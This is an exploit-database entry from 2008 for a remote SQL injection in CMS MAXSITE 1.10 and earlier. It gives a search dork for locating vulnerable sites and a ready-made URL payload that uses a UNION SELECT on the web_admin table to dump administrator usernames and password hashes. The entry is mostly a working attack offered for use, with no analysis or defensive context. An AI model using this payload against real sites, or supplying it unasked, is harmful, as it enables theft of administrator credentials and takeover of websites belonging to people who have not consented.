id: 3071
date: 05/25/2008
title: CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability
author: Tesz
cves: 

=================================================================
CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability
=================================================================



[+] Author: Tesz 
[+] Home: http://www.thaishadow.com
[+] Forum: http://www.thaishadow.com/board/index.php

[+] Download: http://maxsite.geniuscyber.com/index.php?name=index

[+] Dork: MAXSITE or intitle:"MAXSITE"

[+] Exploit: http://server.com/path/index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*

[+] index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*




#  0day.today [2023-03-23]  #